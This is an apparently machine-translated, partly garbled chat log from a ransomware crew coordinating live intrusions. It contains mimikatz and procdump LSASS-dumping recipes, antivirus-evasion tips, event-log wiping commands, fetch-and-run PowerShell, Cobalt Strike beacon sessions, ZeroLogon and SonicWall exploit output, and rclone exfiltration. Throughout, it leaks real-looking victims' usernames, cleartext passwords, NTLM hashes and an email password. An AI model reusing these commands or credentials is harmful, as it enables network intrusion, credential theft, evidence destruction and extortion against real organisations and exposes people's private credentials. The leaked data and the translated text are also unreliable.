when the lsass dumps comes in, remove it, i think it will be more safe than with the injectorPlus to intercept the cache you have to wait for the user to log in
the injector there is fucking dirty by default) it's an injector to intercept the cache from the wdigestoran, you shouldn't have done that
it's not a dumpy read on memsspd I've injected it and got it all)in server 12 and 16 you'll get the same hash if you don't plug in wdigest[ ](https://stylebrooks.com/group/discussion?msg=dGJqSBgsfkkmHtm9n) in the ten lssass does not store passwords in plain sight then you stick vdigest on the host where the admin goes, unlogin him and wait and need only inject lssass)) password may be one of the admin, and I do not have them, to hash, say I have a bakup software, on the password you can enable through the hash and walk through it you do not always need a password cleartextom more this password can be not only on the account of the administrator and also where else will fit, korochki need cleartextom brute force?but brute force, there are passwords Ecx8$U*mn<[CD)G\==and if he got out, his account may not be in lasas, projektil and wait, the user logged in and it just entered the text yes as a variant through the registerdigest null because it needs to be enabled separatelysince it is clear with you these are service accounts for spn and kerberos* Username : mccadmin
* Domain : OPTECH
* NTLM :
* SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f
[00010000] CredentialKeys
* NTLM :
* SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f
tspkg :
wdigest :
* Username : mccadmin
* Domain : OPTECH
* Password : (null)
kerberos :
* Username : mccadmin
* Domain : OPTECH.LOCAL
* Password : (null) Watch the fucking example, what's this got to do with the local service, anywayUsername : OPT-CORP-DC-01$
What's this? [00000003] Primary
* Username : OPT-CORP-DC-01$
* Domain : OPTECH
* NTLM : 591f790562e7f99d27dd870930fecdb7
* SHA1 : c9b9e72ca2feb38411e67834ec07c026a18dd791
tspkg :
wdigest :
* Username : OPT-CORP-DC-01$
* Domain : OPTECH
* Password : (null)
kerberos :
* Username : opt-corp-dc-01$
* Domain : OPTECH.LOCAL
* Password : (null) Fuck, you can't do anything like in the examples above and you can send me the hashes and I'll give them to the brutts.
because this is User Name : LOCAL SERVICE
Domain : NT AUTHORITY[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=fqBSRP3ib4dprsZqP) +is an example of simplicity when you inject into Lsass you get the same as when you dump the memory
Greetings. On the updated W10 and WServer2019, this feature "misc::memssp" no longer works.
After its launch, Windows goes into reboot immediately. He writes that there is a problem and needs to reboot. Tested on more computers.
In general, can it be fixed somehow?
``It's pretty much null by default, tell that to 10k and its server versionmay it not bother you that this is a local service? Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 3/14/2021 4:49:43 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
* kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp : starting with server 2012 and win 8.1 wdigest is disabled under wdigest?there will be the same as in the live dump and with the hash you can not log in by rpvsm zulenolol, and there passwords are all zulenolenny you reinvent the wheel need just dump lsass and all lolvariants to work with getting credentials two, this is one of the options, the second is dipping mimilib into the folder system32, using the right command and reboot, allows you to write the credentials into the txt, but mimilib firewall and in cis32 will fire for sure, it would be quiet if it was not firewalled, I do not know if you need a static or randomprivilege::debug
misc::memsspmimikatz misc::memsspmimspp The above is a logopassword in any case either vinapi or something else is involved[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=Bby9uZL9qAnHbL2Hd) tell me the name of the command you want to run in mimic and crypto won't help you
crypt is static, the method of injection doesn't change over timeaah you probably don't know what i mean, ok the first way is more dangerous than the second you either inject live and look at the memory lsass
or take a dump and look locally in your room what you've thrown at him how to dump the lsassnoozhnu apparently crypt dll and ehashnika so without mimicry above tossed variants)with mimic psh not do takoenu so we're you about what we're writing here) in tekstovik) that would get all logged in lsasstask manager, prokdump sure stray, but not all AV I aim hard if there rdp through the task manager quietest will be, I thinkIf you have a lsass dump, it will be the quietest thing to do, I think:
```
Dumping lsass without mimicatz
2.
2.1 Create a minidump of the lsass.exe using task manager (must be running as administrator): open Task manager by Administrator
2.2. find lsass.exe
2.3. right click on lsass.exe
2.4. choose Create Dump File (you will see path to dump, f.e. it is "C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP")
[2.5. switch to mimikatz
> sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
> sekurlsa::logonpasswords]
-
3. procdump
3.1. cmd.exe > procdump.exe -accepteula -ma lsass.exe lsass.dmp
//or avoid reading lsass by dumping a cloned lsass process
cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
-
4. comsvcs.dll
4.1. .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
-
??5. ProcessDump.exe from Cisco Jabber
``There is a slightly modified version for especially hard ABs
default dumper is not fud, in static at least, not dropdown to disk on dotnet as I recall
dumpertwin defender (even for lsass dumps) but NOT obfuscated stinks badly try to take pawershelf mimic - here you may download it ```.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
```
different in volume, I don't know why
and try to obfuscate there are ps obfuscators[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=hGGZc6EzTxzxTcdCJ) as an option, you can use Invoke-Mimikatz.ps1, and replace the keywords there with your own, a lot of averov statically steal the word mimikatz (I do not claim, but read about it) have any crypto mimikat?i can replace ²sassui with other servers, such as fs or kdo look at the attribute logonCount in ADparalyat at once all the fuckin' popeasuyutabayut admins go to 24 hours and there is no there often go i think it all depends on the specific case and the case for the most part. how often admins generally go to servers? who knows? What is the likelihood that, for example on the shul servak will enter the administrator in the working day? Codeneconnect your account to the office on the deck and dump everything ... so there's like office365Men who worked with ovh.com; export a box or migration of history on another server interestsdzhudponalya know setyat more he already received, and I do notprivet, and when we and Alex and mlsf give deediki and servers under the msf? We are waiting for aha thanks)-rtt means recursion (r), and a command to pack by date of change (tt)
normally everything is packaged with recursion to properly archive the folder
again, `-tt` is FROM a given date, `-t` is BEFORE a given date-command -rt is recursive, but what would be without recursion should be written without r in -rtt that is -rt. it is clear that mush is not clear, where the error in the command or description?
ZIP FILES BY DATE OF CHANGE
zip -rt 2018-01-01 C:\Programdata\zip.zip C:\users\admin\Documents\ - packs recursively (without recursion, remove r in -rt) all files in Documents folder to zip.zip archive before specified date, ie it will download all documents before 2018, older do not take
If by any reason it is necessary from 2018,then write -rtt (if without recursion just -tt)
``+hz, maybe everyone already knew this but me, but still:
the task was to run a shairfinder from a non-domain car(dedicatee) via wpn, solved by calling the pvershell via ran s,
```
runas /netonly /user:domain.local\user powershell
```
and from there shairfinder, the output is there, use it at your pleasure
By the restPars, does anyone have problematic cases - taken YES, but there is no way to break through because of the AV ? In particular sofos. Draughts in private, have an idea how to solve the inside of the script probably need to enter the domain instead of None who yukal https://github.com/Yt1g3r/CVE-2020-0688_EXP
there is a problem with the execution, the authorization gives the correct, but then the error, who encountered? pm@kalinka fixed sofos like this option, did not work in extreme cases[ ](https://stylebrooks.com/group/general?msg=2MNvAuFf3HxmhQ6iZ) tried? in 2 cases tested - no cooze and it's not afraid of avsam reboot pknado lokera functionality as revil heard there, it is registered in the reboot, in safe mode and locosofos handpoint can be knocked out by pvsh script, but you need to reboot me now there is a grid here italy, and here sofos on password too, i found a panel, but i do not understand the fuck out of it. i dont know if it's the same or not. i thought i could paiload and lock.@Shved but if the koba crypt and spread paiload and then dll lock, why not an option?:muscle:thanks, so will do) find some quiet servers and drain them.hello everyone. Who can help with the grid lock? The rights are up, the data is pumped out. Main domain(175serv online) + 2 trusts(~40serv online). The problem is that there are sofos with password everywhere. Finding the passcode from sofos is not possible. Any changes in sofos settings are restricted, the maunty lock will not work, although the cars without AB is. Need a man who can cut / stop sofos. Otpisit in pm, who knows how to fight sofos.me at any time, but it is recommended at night. at your own riskvshey all hello! clue me, the date usually put the drain during working hours on the grid or at night? if there just need to activate cheto no problem shops, banks are sure palyatatse who palyat* google voz like palyatam straight under the state can choose a number google voziteVice very necessaryPriest
Does anyone have an option for a permanent sim card in the US to take a few sms? Activator mb in contacts + is VERY important in terms of getting access@all TO ALL, urgently.
Within two days in networks where you work with the rights and where there is an exeChenge check whether vindef on these exeChenge servers@all call me in the confab please, where you need builds lockershttp://rmusser.net/docs/Active_Directory.html@all 209.222.97.78 - whose grandfather? don't connect to him@all laurent-perrier.fr don't see the case thisjask[ ](https://stylebrooks.com/group/general?msg=6hvXr8S7ES64vC8qH) on the git in the manual says what could be easier
python -m pip install
but simpler could be
python -m pip install impacket from the downloaded release folder, not the master branch
It may complain next that there is no readline module
pip install pyreadline
and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing)
it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windowsимпакет not installed. what is your problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chachhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? or maybe someone has a way to get the info fast ?wanted to netsapp therein palyfakt dlltut still in progress what's up ? @giovannielefant in the wrong channel threw the man just = )ahahahhapriet - goodbye ? :D hellohelloworld123 hellohelloworld123 hello go to the group all hello ! when will we start raping mubey ?
CMD5 Email: arsahgg314@yandex.com
Password: faA3g$^@fdzf@4
Try and bypass the VPN requirements by specifying the domain on the machine you connect frominvpntax it didn't connect here how do you do ?kkpost on brut plz
```
8f52c41fd02ce50f07ccff44c8fef870
1811bb3f06f3f07b9f15d27afbe60bcc
6af6c6b11d776531653150238b93b7ee
06cbf8ea1fcbfcfd75582ccd18fbff6e
7dacfa3217f1ebdbfc95b94c02ba8965
4d28221cf81af229e8b44207b92c4df5
46a256f5607225eaf22cb7099a02c079
a2d2d89a377e4b1e079adecb5bfd71e0
c57f3d5f1cf656fe45a6d5142ddafc10
``If it's not hard to check this one more 80fe4359c69cbf41f2b46b620533dc6d have you been able to scrub?
cmd5.org can't takevampiru steven had a workout@all hi gentlemen. If memory serves me right, someone here has rklon from memory share info how and what ?@all who has a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can still do so:
``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1"
``````
Cleaning Logs
1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them.
Get-EventLog -LogName *
2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop:
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time.
To display a list of logs registered in the system, run the command:
WevtUtil enum-logs
Clearing events in a particular log is done as follows:
WevtUtil cl Setup
Before clearing, you can back up the events in the logbook by saving them to a file:
WevtUtil cl Setup /bu:SetupLog_Bak.evtx
To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them:
Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName }
or like this
Wevtutil el | ForEach { wevtutil cl "$_"}
4 Log clearing can also be done from the classic command line:
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Log Cleaner Batnick
PHP:
break>"%CD%\server_log.txt"
break>"%CD%\logs\errors.log"
break>"%CD%\logs\log-core.log"
break>"%CD%\logs\warnings.log"
break>"%CD%\logs\plugins\mysql.log"
Clear all Windows Event Viewer logs
1. CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
2. powerShell
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
``@@all eataly.com was once a long time ago such a res, please tell me who localized it) @slice aren't you by any chance? @t3chnolog ?[ ](https://stylebrooks.com/group/general?msg=AoceiT5ePNBEQeFbk) no root there pomoyu, it is always emptyVMware vcenterhyper-v? guys, has anyone decrypted root passes from vim base to hypervisors?the same or not commands take 5-15 minutes to execute disconnect sonic and check packet loss, unstable connection to the tim sevrverdono however, when i reconnected via posh, lag began only when i vpnku on sonic raised on nemya already reconnected via posh, the same shit99rdp addicts from amazon? and as ran excelshot on the new addic, the server begins to fiercely stupid guys, have you encountered problems?
- I've got a new deck.
- configured the exe file
- ran it on the new dedic
- The dead disk appeared in the cob
- any commands in bacon are executed by 5-15 mindump with cmtp???? :face_with_monocle:outluckily make a dump of the mail from the smtp server, on the credentials, what software besides Thunderbird can be used? ``execute-assembly /home/user/txt/edu/Fast-Guide/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
``Thank you, I'll check it manually,`` use rubus in the manual from the forum, I'll write back, it won't start via execute-assembly for some reason, then this is a rubus script, but should I put a link to rubus from githab in DownloadString?
powershell.exe -exec Bypass -C "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://
```
you get it)``.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
```
and put this parameter in front of IEX DownloadStringtry without importing it from github I thought verashell imports it directly into memory so psingectin works I wonder why it tries to download it from the localhost via a downloaded string is it not rubus? ``beacon> powershell-import D:\therOther\Invoke-Kerberoast.ps1
[*] Tasked beacon to import: D:\Other\Invoke-Kerberoast.ps1
[+] host called home, sent: 12760 bytes
beacon> psinject 2384 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 into 2384 (x64)
[+] host called home, sent: 134785 bytes
[+] received output:
ERROR: DownloadString : Exception calling "DownloadString" with "1" argument(s): "An exception occurred du
ERROR: ring a WebClient request."
ERROR:
ERROR: At line:1 char:46
ERROR: + IEX (New-Object Net.Webclient).DownloadString <<<< ('http://127.0.0.1:8206/'); Invoke-Kerberoast
ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin
ERROR: g UTF8
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: Invoke-Kerberoast : The term 'Invoke-Kerberoast' is not recognized as the name of a cmdlet, functio
ERROR: n, script file, or operable program. Check the spelling of the name, or if a path was included, ver
ERROR: ify that the path is correct and try again.
ERROR:
ERROR: At line:1 char:91
ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8206/'); Invoke-Kerberoast <<<<
ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin
ERROR: g UTF8
ERROR: + CategoryInfo : ObjectNotFound: (Invoke-Kerberoast:String) [], CommandNotFoundExcept
ERROR: ion
ERROR: + FullyQualifiedErrorId : CommandNotFoundException
ERROR:
``Hi, guys no one faced, starting rubus script gives out:Guys, why can proxy in koba not start? I added a dedicce to the cob, PKM - pivoting - socks server - launch
I can't always see it in proxy pivots but it is almost always broken.
Does the dll injector from under kaspersky work? Or does it work ?here are all valid Sregel Porkchop2020!
jforrest MNHY7ujm
cmiklos gUBA40*r
kmanoatl PortCity22124#
bgrishkat SecondGirl$18
msallada P@mAm@nd@6
bstaudt Zelda22!
bsirstins !Dunno55www
grouse HaleyBug20!
rwalker banBMWin2017!@
for vorks up there differentdth[e nfv hfpyst give me a login pass? so what you hooked a creed not a bad percentage of 10-15 percent gets through workinghf,jxfzna how much is this working topic by the way zerologon not tried here apparently vorks are offnu normcervaks pingedcthdfrb gbyue.ncz so everyone is watching no pings at allvpn tonoch work the only working sonic crudes have 13 days to livekready'.\Administrator:Sysadmin1' Administrator What token to get on the vorks on this pidtut if we get to put a clipokdavay evening will see what to do with them so need help) do not pull anything out of them I can not leave three vork logged in case the vpn will fall off ``[+] 101.1.10.43:445 - 10.1.10.43:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.32:445 - 10.1.10.32:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.40:445 - 10.1.10.40:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.44:445 - 10.1.10.44:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.66:445 - 10.1.10.66:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.67:445 - 10.1.10.67:445 - Success: '.\Administrator:Sysadmin1' Administrator
This is a new krypt on monday i got a new krypt on Monday so i dont know how to start it but i just want to give it a go and try to add the domain, maybe it will work
[-] 192.168.1.56:445 - 192.168.1.56:445 - Failed: '.\Administrator:Sysadmin1',
``failed to sysadmin on the servers looked under the domain it locale?directly on the controllergachekni smb login5fa7b5f9c23a16c0f9644cb907c85a95 Sysadmin1Sysadmin1 913147b3d5a680ae41f23b1d2bf1f293da wait ``DVK0HQ2\eisadmin 5fa7b5f9c23a16c0f9644cb907c85a95
DVK0HQ2\Guest 31d6cfe0d16ae931b73c59d7e0c089c0
DVK0HQ2\DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0
DVK0HQ2\WDAGUtilityAccount 42da01550980089a444a5899ac6a053d
DVK0HQ2\Administrator 913147b3d5a680ae41f23b1d2bf1f293
``[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 2743 bytes
[+] Impersonated NT AUTHORITY\SҮTSTEMKER: Need help ``beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 264391 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
[+] received output:
getsystem failed.
[+] host called home, sent: 12 bytes
beacon> inject 912 null https_spotver
beacon> sleep 2
[*] Tasked beacon to sleep for 2s
[+] host called home, sent: 16 bytes
beacon> hashdump
[-] this command requires administrator privileges
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
[-] Could not connect to pipe: 2
beacon> execute-assembly C:\soft\SharpChrome\SharpChrome.exe logins /showall
[*] Tasked beacon to run .NET program: SharpChrome.exe logins /showall
[+] host called home, sent: 930377 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
beacon> execute-assembly C:\soft\Net-GPPPassword\Net-GPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
beacon> execute-assembly C:/soft/Seatbelt/Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
[*] Tasked beacon to run .NET program: Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
[+] host called home, sent: 652435 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
``but I don't know what to do next on the rdp I disabled sofos, session in the coboo got binary jumped ``[+] 10.1.10.50:445 - 10.1.10.50:445 - Success: 'EIS\Sregel:Porkchop2020!!!' Administrator
[+] 10.1.10.32:445 - 10.1.10.32:445 - Success: 'EIS\bgrishkat:SecondGirl$18' Administrator
[+] 10.1.10.40:445 - 10.1.10.40:445 - Success: 'EIS\bstaudt:Zelda22!' Administrator
``busted beacon> execute-assembly C:\softsoftsoft macafee sofos and sentinelchuvak turned out to be an admin on the same vorkjecto here? @alter in which confab you threw your zerologon?
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe EIS2019DC.eis.local
[+] host called home, sent: 114257 bytes
[+] received output:
Performing authentication attempts...
[+] received output:
Unable to complete server challenge. Possible invalid name or network issues?
``Servers on ms17 are invulnerable and their self-servers are 2008 with creeds in the sense of jumping on the sevens to poryaday zerologon and 17-010 on the sevens `` well I'll take hell off`` ``.
[+] 192.168.1.66:445 - 192.168.1.66:445 - Success: 'EIS\Sregel:Porkchop2020!
i got through to them @alter @steven any idea how to start it let's say i uploaded some binary what to do with it i don't fucking know what to do here in the bookmarks like i have access to the fileshare of the server so i can't see the hrd i look after web authorization there is no hrd anywhere ?it sends some other codes to the mobile app usa it does not accept backups codes go check the domain admin
[+] Checking URL https://66.208.26.12
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.7-22sv
[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://66.208.26.12
[+] Found: SessionID: 11EX0qbJxgw0oxHnmy8JIVMXF1odMPLZFVNyyWT1MFU= userType: 1 userName: Sregel Password: Porkchop2020!! Domain: EIS
[+] Found: SessionID: 2r22NuGvDeRcTXKEOr7AUjcQ0spvbucbZgRBv1071VU= userType: 1 userName: jforrest Password: MNHY7ujm Domain: EIS
[+] Found: SessionID: D1KJjvBfSbYKdu614Kc0ZQuYTlI0wzS1xpN5jF9colg= userType: 1 userName: cmiklos Password: gUBA40*r Domain: EIS
[+] Found: SessionID: GyTuUXiZLbVonpbsD31qB4QCHpkxI11xEyaiVx1ACTQ= userType: 1 userName: kmanoatl Password: PortCity22124# Domain: EIS
[+] Found: SessionID: J9A0EFXfl4HAkj00LeK56DLLxu6YFoUrquKEMQVZc0A= userType: 1 userName: bgrishkat Password: SecondGirl$18 Domain: EIS
[+] Found: SessionID: OuD0WnJK95pmxOGglFsh5dXpiKHHVWRl1pdERQnh7kc= userType: 1 userName: msallada Password: P@mAm@nd@6 Domain: EIS
[+] Found: SessionID: UsAfbc265IgQmX49C3rPjgV1flhWkKeWBausk5HaL5U= userType: 1 userName: jpontzer Password: $KroKoo88KwoKoo Domain: EIS
[+] Found: SessionID: bkt4BQbR111l1TMf9b8RQYDhtOrpFY0jILCuneZeCGE= userType: 1 userName: bstaudt Password: Zelda22! Domain: EIS
[+] Found: SessionID: j9vcC7JOBCvr5VJgKocfEk5hMZlPbO5Pe7PQslj5Bj4= userType: 1 userName: bsirstins Password: !Dunno55www Domain: EIS
[+] Found: SessionID: mr5HXc4QAy1Hz6fwcuCWXI9UlN1zk7ozS8Ac1G0akaw= userType: 1 userName: grouse Password: HaleyBug20! Domain: EIS
[+] Found: SessionID: oXcf0mbsYkyHFpNx336zW7RwlaQUmbXp7MPFHW0jfC4= userType: 1 userName: jgoda Password: Pragti(82)@jg Domain: EIS
with these sonics there's only one thing wrong with them, I'm going to try to retrieve the codes right now@alter I have to retrieve them, but all the sessions are dead, the usual 2fa with backup codes, what coba do you have, can I help you?vampiralterda ok, i'll get it right away@stakan take it for yourself right awaytakapAU Fucking 2 months this case lasts? have you looked? yes, i will do so from the looks of it so why not just take a separate folder listing and delete any other gui shredder? all with the past!
hint, making a log of the deletion of the date, run the command
``erase /F /S /Q E:\FTP\targetname >> erase_all.txt```
because there are files with too long paths
the command gets interrupted with an error like "file path is too long".
I found a thread on stackoverfall with a similar problem, it was advised to make a mapping folder and apply the delete command to the linked folder.
I did it, everything was deleted, but the log of the deleted files was not saved
advise, mb someone already faced with this, how to solve? thank you very much give a list of avs that palyat, please dll*LLVM exe 5/23msvs x64 4/23llvm x64 was 2/23pm can someone dincheck? thanks)oh cool@all updated artifact, it was cleaned otherwise the sameBest Case Bankruptcy program opens the client base with this extension. I don't know if anyone can use it. Happy Victory Day to everybody! Happy Victory Day! :handshake:Happy Victory Day! :thumbsup: :thumbsup: :thumbsup:.)
Happy Victory Day to all comrades)Happy Victory Day, gentlemen! 2020-2021 Ransom - repeat :))Happy Holidays to all! proton gives you to register if sox normal btw. such as with lux lux extra wedge +1 to karma)[ ](https://stylebrooks.com/group/general?msg=yEHSkuvicFssvNEWc) account should be called by a normal name, without firms and so on and originally should react with a clean ip, then at least with what come zahpishu write them that I am a decent type and did not violate, but no response so far)it is true, but there is one but)I incidentally proton once registered for 10 minutes e-mail, there was a code and I normally zagoregalitutanota normal?
where is the best place to get anonymous emails?
Proton began to fuck my head with registration (i updated java, the most interesting thing i restart without closing the first window, and it opens correctly at the top of the first window.
4.3 does not work so what version of java? I start with a wind-up server, ehashnikwas, I changed pps and normal)) All shalom!
Who has run into this? @terner write in PMhuy holiday):partying_face::fireworks:Happy Encryptor Day all) :Dah, well, I thought something else) ipi will change, and the hostname is notLS1818.dkengr.coma what is the hostname?
if the host of the employee, then you have to remember the host name, not if the host is now offline and its ip is busy? when the host goes offline its ip is taken by another host, the distribution by DHCP
but since the dns entry points to some ip, it is pinged, so you have such a hat happensDHCPHello all, colleagues here is the situation:
there is a YES and his car iris_borra LS181818
When pinging the hostname
```
Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data:
Reply from 10.1.20.15: bytes=32 time=18ms TTL=127
Ping statistics for 10.1.20.15:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 18ms, Maximum = 18ms, Average = 18ms
```
and users
```
Directory of \10.1.20.15\c$\users
09/03/2019 03:05 PM .
09/03/2019 03:05 PM .
09/03/2019 02:51 PM dkuser
12/06/2020 03:13 PM iris_borra
10/30/2019 09:44 PM public
0 File(s) 0 bytes
```
some time later
```
shell dir "\\10.1.20.15\c$\users\\iris_borra\Downloads\"
[*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users\\iris_borra\Downloads\"
[+] host called home, sent: 80 bytes
[+] received output:
The system cannot find the path specified.
shell dir "\\10.1.20.15\c$\users"
[*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users"
[+] host called home, sent: 58 bytes
[+] received output:
Volume in drive \10.1.20.15\c$ is OS
Volume Serial Number is 52A8-6845
Directory of \10.1.20.15\c$\users
06/26/2020 03:16 PM .
06/26/2020 03:16 PM .
05/31/2019 03:03 PM administrator
05/31/2019 02:50 PM dkuser
03/16/2021 08:40 AM paul_munoz
04/26/2019 03:21 PM public
11/29/2020 09:06 PM Wendy_Munoz
```
and the polzak just disappears from the car, on another ping:
```
Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data:
Reply from 10.1.20.15: bytes=32 time=13ms TTL=127
Ping statistics for 10.1.20.15:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 13ms, Maximum = 13ms, Average = 13ms
Directory of \10.1.20.15\c$\users
06/26/2020 03:16 PM .
06/26/2020 03:16 PM .
05/31/2019 03:03 PM administrator
05/31/2019 02:50 PM dkuser
03/16/2021 08:40 AM paul_munoz
04/26/2019 03:21 PM public
11/29/2020 09:06 PM Wendy_Munoz
```
When querying through the hostname
```
shell dir \LS1818.dkengr.com\c$\users
[*] Tasked beacon to run: dir \\LS1818.dkengr.com\c$\users
[+] host called home, sent: 63 bytes
[+] received output:
Logon Failure: The target account name is incorrect.
```
anyone encountered this? how is it cured? Truly work rans! Mutual! Happy holidays to all!!! Happy May Day, gentlemen!
Peace! Labor! Rance! Who decrypted ultraVNC?ini , there's a hash{"$binary":"8kWjqI0y8R+MNt/Kub61wAPryhMSHUtb9U5HZdyStO1UZFZugftryBYpesOxjRkSHkIpKUfUQ3iZ8Y6PgUMTyD3Pd69Fwo6HuYH0uK2WT5eHdm0Ru8pyrkCPDWs3/WyZRviJGj6MaEHpvu4MqaPipVv8nIczyt2qjBZQY/W/4DkaAmvdGdLlmDQl2V7al69LkGfR6nZrELn0K1CrLtzHO5ubVeLPCR1HzXIUj6qfqSy8D9jL"}{"$binary":"qlY9Yy/uKCOjgjFaDHegKKYKuWCtCV5e4xxcN73o9Y3T1EeAbrKGJELVsZncMlxqppiOlLXDIsWILbkknTxKzZKx6fgducw1SagGWekXyIHQRMk9viX7pzOASl31nvLdTcIF0f6hBro8EF4EL08nY4D/+Jz0INaiE54PZ9s+TcmUpeXxHf6CDZGjoX+ZpIBgqRANdMydjWhAgYEqfvaI1"}{"$binary""xPACqYgFfTMW286bcFZjKwwFOzc9DMCuywe1mtRataDIZEf6cI2BsEX6eClML8xkzpgVRsx5o1bg7wBrz9VtvrAz2RPRjwPpZ1N8ijcGR/idLDAUpsv6EPHjJMKt4CdWZcriyFj1d9nqz/yQOTZ7sp4F/8W3nzqy1mIzTaecw+z247sVv3mQTDb7QSVahenetbKpXtM9QYaEgav1Bih9LlsVZhUqAuTggtZMs9t4FQ=="}{"$binary":"LrqENVpIrVsphbKn+Qnm6ZoLgeO0/VgmGzo1QrHjJeFnlHlUNHWfxozW3m9uRGVSHnYH1wZKqV7yMg9/uVC/XqUGaF3zgdIKJpi5gvsQ0VNS5wmwjG/TsiJSrA8AKMyiiaAMivi5oZGtYecTKOFGh7h+F2M+cyKsGRy0l8uHs0SfAOkvID0vPmR9zbFdOez9L1+P6FHWsCVh+JoYyQ2aBV6rWn0CM7uzHY1t0HNU0A=="}привет@alter please add jaskaga ok@all about pouring the data on "silent"
we will do it at the end of this week, please structure the data on old cases not to stretch this process too long, I will create news and give accesses / company codes to fill@all a set of alternatives to ngrock, for tunneling
https://github.com/anderspitman/awesome-tunnelingно there's a newer version of this, we won't be filming it today@all friends, I'm going to bed early today, if anyone needs cases, PM me please[ ](https://stylebrooks.com/group/general?msg=Q72XGqyet3ixEiuXe) --ftp-user
--ftp-user is interesting, is there an example command?
If megasync lags, can not download the archive or the speed is very low, you can use the same rclone to unload the archive
rclone.exe move remote:archive E:\ -P --multi-thread-streams 12 --transfers 12
where remote is the name of the config, archive is the name of the folder, E:\ is the folder where the archive will be dumped, -P shows the progress of the download, to not see any progress change it to -q, --multi-thread-streams and transfers for high downloads
really helped a lot to cope with anomalies in the form of 200 kb/s and when the archive is downloaded 500 times and eventually not saved to disk
``OK, it worked.
